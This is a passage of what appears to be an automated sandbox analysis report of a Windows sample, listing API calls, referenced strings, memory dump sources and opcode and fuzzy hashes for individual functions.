                                                                                                                • Instruction Fuzzy Hash: FD318E325303126FC72966F8AC6597EB379AE42730721025FE4229B8D5FF24D883CA90
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,022A9961,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3), ref: 022A970B
                                                                                                                • GetLastError.KERNEL32(022A9961,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3,?,89018BEA,?,418B0446,5B5E5FC0), ref: 022A973B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 442123175-2496334608
                                                                                                                • Opcode ID: 61a23f5a6b74446bc09bcc1b01fef62f1265c00a34cd4f65ee584c000f0883c4
                                                                                                                • Instruction ID: 0cef9d651dde0262f0cbd5e54401ffebdf7dbbaf878773cf81061036cb58cbb4
                                                                                                                • Opcode Fuzzy Hash: 61a23f5a6b74446bc09bcc1b01fef62f1265c00a34cd4f65ee584c000f0883c4
                                                                                                                • Instruction Fuzzy Hash: 68319271A10219AFDB14CFA9DC91BEAB3A9AF44304F0444A9E905D7694DB70EEC0CB60
                                                                                                                APIs
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 022AC862
                                                                                                                • __freea.LIBCMT ref: 022AC86B
                                                                                                                  • Part of subcall function 022A798A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 022A79BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeapStringType__freea
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 4073780324-2496334608
                                                                                                                • Opcode ID: 1998b69309f3c52133120a00d1f47036cfc9566080c0ef98b50d153d1317182f
                                                                                                                • Instruction ID: 270fe9bb84f0dad0425bc10581d02e0d9e2de975f354920e68612bca16df39e0
                                                                                                                • Opcode Fuzzy Hash: 1998b69309f3c52133120a00d1f47036cfc9566080c0ef98b50d153d1317182f
                                                                                                                • Instruction Fuzzy Hash: 2631D271D10206AFDF229FA4CC54EAFBBAAFF44310F454166EC14AB658DB308951CB90
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,5B5E5FC0,00000000,?,?,022A9951,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000), ref: 022A95E3
                                                                                                                • GetLastError.KERNEL32(?,022A9951,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3,?,89018BEA,?,418B0446), ref: 022A9609
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 442123175-2496334608
                                                                                                                • Opcode ID: 3ffae679a0b7401ad1d234173eb96d460c1091c13eadf6f65fdc89e650b4a8d3
                                                                                                                • Instruction ID: 0d6190a15d5ae4f771f01f84c31a08ff2f54ace2f5243b81bb98610eb64d8fde
                                                                                                                • Opcode Fuzzy Hash: 3ffae679a0b7401ad1d234173eb96d460c1091c13eadf6f65fdc89e650b4a8d3
                                                                                                                • Instruction Fuzzy Hash: BA218F71E102199BCB14CFAAD8919A9B3B9AF48315B1445AAE909DB254E730DE81CEA0
                                                                                                                APIs
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,5B5E5FC0,00000000,?,?,022A9971,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000), ref: 022A94FA
                                                                                                                • GetLastError.KERNEL32(?,022A9971,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3,?,89018BEA,?,418B0446), ref: 022A9520
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 442123175-2496334608
                                                                                                                • Opcode ID: baf27f826e25c8e37fba7abff972467402a3fcf4dacd894ee7f97942c7ddde45
                                                                                                                • Instruction ID: 0938c72d5f6b4bf48112d9bc282bd131e97eb82354b50ba1116e7f92364baa2d
                                                                                                                • Opcode Fuzzy Hash: baf27f826e25c8e37fba7abff972467402a3fcf4dacd894ee7f97942c7ddde45
                                                                                                                • Instruction Fuzzy Hash: 6721B134E102199FCF19CFAAD890AEDB7B9EF49305F1444A9EA06D7204D630DE82CF60
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0229F2FF
                                                                                                                • ___raise_securityfailure.LIBCMT ref: 0229F3E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 3761405300-2496334608
                                                                                                                • Opcode ID: 094a4f4e8a6beddf07790b56e1b2d547280169ea491b79083bd29b3b6bf6a565
                                                                                                                • Instruction ID: cf7d9f9155c6a786c0b3161aeab5a5a23596e8236add4803911d49fd0f7648d5
                                                                                                                • Opcode Fuzzy Hash: 094a4f4e8a6beddf07790b56e1b2d547280169ea491b79083bd29b3b6bf6a565
                                                                                                                • Instruction Fuzzy Hash: 0A21DFF4D91200DAEF04EFE6F54EA503BA4BB58314F11486AE608CF390E3B094A0EF44
                                                                                                                APIs
                                                                                                                • SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D173
                                                                                                                • SetDlgItemTextW.USER32(?,00000066), ref: 0040D17E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemText
                                                                                                                • String ID: RENAMEDLG
                                                                                                                • API String ID: 3367045223-3299779563
                                                                                                                • Opcode ID: 8ed6787faad9cbbb868cc10b0d52fa6021cdc34f303c054ea177ed56621f72de
                                                                                                                • Instruction ID: 4ee24befb69e4a1be06190cd166144852e42fe61c15f0a09565bbf0927b3cd60
                                                                                                                • Opcode Fuzzy Hash: 8ed6787faad9cbbb868cc10b0d52fa6021cdc34f303c054ea177ed56621f72de
                                                                                                                • Instruction Fuzzy Hash: 7C01FC32A4411876DA205F919C01FBB3B59DB4AB50F100437FA04BF1C0CEB9941AA7AD
                                                                                                                APIs
                                                                                                                • _realloc.LIBCMT ref: 0040AA73
                                                                                                                  • Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __vswprintf_c_l_realloc
                                                                                                                • String ID: Maximum allowed array size (%u) is exceeded$lB
                                                                                                                • API String ID: 620378156-1794904129
                                                                                                                • Opcode ID: d41e2a704565317fd2c94e81f40aa926b5c88f24b45188604948ce81e6fec88e
                                                                                                                • Instruction ID: b500f34932ad8ce4e05e853272086ad43b1a6074f26b2f7342b59cfe4da1b029
                                                                                                                • Opcode Fuzzy Hash: d41e2a704565317fd2c94e81f40aa926b5c88f24b45188604948ce81e6fec88e
                                                                                                                • Instruction Fuzzy Hash: BC0171353007015FD724AA25D99192BB3D9EB88714350843FE99BD77C1EA38AC54CB59
                                                                                                                APIs
                                                                                                                • _realloc.LIBCMT ref: 00411DED
                                                                                                                  • Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __vswprintf_c_l_realloc
                                                                                                                • String ID: Maximum allowed array size (%u) is exceeded$lB
                                                                                                                • API String ID: 620378156-1794904129
                                                                                                                • Opcode ID: 28825acc152db52d3fa0281383477f54fa058ab7c67e1a66e1805b51de25f82b
                                                                                                                • Instruction ID: d82eadcbee8117c8ff3590695266b88f0c89928d08ab8b2669795ace0bbb6508
                                                                                                                • Opcode Fuzzy Hash: 28825acc152db52d3fa0281383477f54fa058ab7c67e1a66e1805b51de25f82b
                                                                                                                • Instruction Fuzzy Hash: A301B1353007014F9324AB56D89196BB3D9EB84714350443FE99BC7B92EA38FC408758
                                                                                                                APIs
                                                                                                                • _realloc.LIBCMT ref: 00411D56
                                                                                                                  • Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __vswprintf_c_l_realloc
                                                                                                                • String ID: Maximum allowed array size (%u) is exceeded$lB
                                                                                                                • API String ID: 620378156-1794904129
                                                                                                                • Opcode ID: 9cf5ef9fa059dcd5117f9738842c8236dfe7822d8a6092f76d869565331e43d3
                                                                                                                • Instruction ID: d13bf4787bdaf7665f189edcac7a8d1bdd75279939e97790243e6d88f610abd6
                                                                                                                • Opcode Fuzzy Hash: 9cf5ef9fa059dcd5117f9738842c8236dfe7822d8a6092f76d869565331e43d3
                                                                                                                • Instruction Fuzzy Hash: CB01DF763006015F9324AB16E89196BB3DDEB80764350883FE99BD3B51EA38BC818758
                                                                                                                APIs
                                                                                                                • _realloc.LIBCMT ref: 00401214
                                                                                                                  • Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __vswprintf_c_l_realloc
                                                                                                                • String ID: Maximum allowed array size (%u) is exceeded$lB
                                                                                                                • API String ID: 620378156-1794904129
                                                                                                                • Opcode ID: 8c286346231573e52bf9bdac3113c4ca5047a0ff642fad15a825e23e0f5008e7
                                                                                                                • Instruction ID: 568b596e3018965ec9595de06f1301c8bb83e75b927032956014d8f4f3e6bc85
                                                                                                                • Opcode Fuzzy Hash: 8c286346231573e52bf9bdac3113c4ca5047a0ff642fad15a825e23e0f5008e7
                                                                                                                • Instruction Fuzzy Hash: A601BC322006059FD324AA56D48092BB3EDEB84328351493FE99BE3792EA38FC408758
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0AF
                                                                                                                • LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0C1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadString
                                                                                                                • String ID: xB
                                                                                                                • API String ID: 2948472770-2250720281
                                                                                                                • Opcode ID: 1bc04d45c5cdfb42c06f2eed55935f251d0dc257803f803710fafc90295b38cf
                                                                                                                • Instruction ID: bcbecee609e592aace6aca3dfc06c1f6893ca9f60a3ac38b0d71b54fe5a4558a
                                                                                                                • Opcode Fuzzy Hash: 1bc04d45c5cdfb42c06f2eed55935f251d0dc257803f803710fafc90295b38cf
                                                                                                                • Instruction Fuzzy Hash: B3018632710210AFD6209B66AC84F577AEDEF96354F00453BF504D2260D7359C01C76C
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcschr_wcspbrk
                                                                                                                • String ID: ?*<>|"
                                                                                                                • API String ID: 3305141221-226352099
                                                                                                                • Opcode ID: 8297a28fad67a498d65ce2db0a1ea6ffe756b7e251e3d4108ae2fd75c5d1f36c
                                                                                                                • Instruction ID: bb2577b11979df31ae1d288d9972051883ae3c7c2f7aabc7a1d549f5a06b56f6
                                                                                                                • Opcode Fuzzy Hash: 8297a28fad67a498d65ce2db0a1ea6ffe756b7e251e3d4108ae2fd75c5d1f36c
                                                                                                                • Instruction Fuzzy Hash: 8FF08C2911832354DE2C6A6594016B363E8DB1AB94B64847FF8C1F22D3E73DCC82C2AC
                                                                                                                APIs
                                                                                                                  • Part of subcall function 022ACB81: RtlEnterCriticalSection.NTDLL(00000000), ref: 022ACB9C
                                                                                                                • FlushFileBuffers.KERNEL32(00000000,022BC838,0000000C,022A8FC1,022A230F,?,022B3318,022B3318,022A230F,?,022B3318), ref: 022A8F03
                                                                                                                • GetLastError.KERNEL32 ref: 022A8F14
                                                                                                                Strings
                                                                                                                • D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022A8EFB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                                                                • String ID: D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c
                                                                                                                • API String ID: 4109680722-112580537
                                                                                                                • Opcode ID: 4843e1b3cdc0c4fa1f63f16d22b125b5615ab98d817a7c1bc68654f014f50385
                                                                                                                • Instruction ID: e1aff1456bc34b729dcc77c0187081a1bce629a6615c22431ea5f3f6ef336685
                                                                                                                • Opcode Fuzzy Hash: 4843e1b3cdc0c4fa1f63f16d22b125b5615ab98d817a7c1bc68654f014f50385
                                                                                                                • Instruction Fuzzy Hash: 18018C32E603058FDB15EFE8E819A5EBBA6EF49720F10465BE411DB694EB7498018F90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004196D1: __getptd.LIBCMT ref: 004196D7
                                                                                                                  • Part of subcall function 004196D1: __getptd.LIBCMT ref: 004196E7
                                                                                                                • __getptd.LIBCMT ref: 0041D177
                                                                                                                  • Part of subcall function 0041DC71: __amsg_exit.LIBCMT ref: 0041DC81
                                                                                                                • __getptd.LIBCMT ref: 0041D185
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd$__amsg_exit
                                                                                                                • String ID: csm
                                                                                                                • API String ID: 1969926928-1018135373
                                                                                                                • Opcode ID: 321913763c99b3bd191a566b9e7829b8f1ac9bf2def8adda9709ea10ad968c08
                                                                                                                • Instruction ID: de875d6bece7835daa247b9eb914e2b65c94ab0c1e069700b04dae6991395b4a
                                                                                                                • Opcode Fuzzy Hash: 321913763c99b3bd191a566b9e7829b8f1ac9bf2def8adda9709ea10ad968c08
                                                                                                                • Instruction Fuzzy Hash: F4014FB4C00704ABCF349F25C4486EEB3B6AF10351F54491FE84156661DB3889D1DF59
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy_wcslen
                                                                                                                • String ID: TeB
                                                                                                                • API String ID: 2972469078-346873888
                                                                                                                • Opcode ID: 9369c93b066296c41581a1acd797f8aae873a66f8d63b70f52ea728b83c955a2
                                                                                                                • Instruction ID: 5092ac4648e0357d6d94db008c5a8fb3950d3525b2bf4806f66944b5226ffe7f
                                                                                                                • Opcode Fuzzy Hash: 9369c93b066296c41581a1acd797f8aae873a66f8d63b70f52ea728b83c955a2
                                                                                                                • Instruction Fuzzy Hash: FCE0DFB22043016B9224EA4AE8C1C97A3EDDE883A5310443FF25587242CE78AC4587A8
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00420499
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 190572456-1276376045
                                                                                                                • Opcode ID: b6058420a326d07f330a6f3ae2d5a3b71ea341ebe4a225979e3c26eb4b47ed3e
                                                                                                                • Instruction ID: 0af4a1246795dc1b109d18277006bc859a7a5a95eebb3f7eac335b8bdd8e1a77
                                                                                                                • Opcode Fuzzy Hash: b6058420a326d07f330a6f3ae2d5a3b71ea341ebe4a225979e3c26eb4b47ed3e
                                                                                                                • Instruction Fuzzy Hash: 68D022303843147B4E503BF3FC06E073A8CCE80BA23A980AAB40CD1141CE2EC80080BC
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410AE6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
